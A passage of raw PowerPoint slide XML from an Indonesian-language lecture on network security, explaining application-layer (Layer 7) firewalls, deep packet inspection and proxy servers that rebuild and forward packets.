            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> UDP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sulit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> UDP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> header IP dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anomali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ICMP.</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107</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36733072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Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> header dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>utamanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencoba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data TCP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mentah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port 80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port 80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menganalisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> header HTTP dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemformatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>halaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> string yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Firewall yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nama yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> application layer gateway, stateful multilayer inspection, dan deep packet inspection. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> filter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpisah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (HTTP dan HTTPS, SMTP/POP/IMAP, FTP, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagainya</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108</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39161931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Server Proxy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Firewall yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proxy. Di mana firewall </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bekerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-dan-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meneruskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekonstruksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemudian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membangun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kembali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meneruskannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Jumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pembangunan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ulang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada proxy. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> proxy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memanipulasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> header IP dan TCP. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Proksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menghapus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> header HTTP. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Proksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pemeriksaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
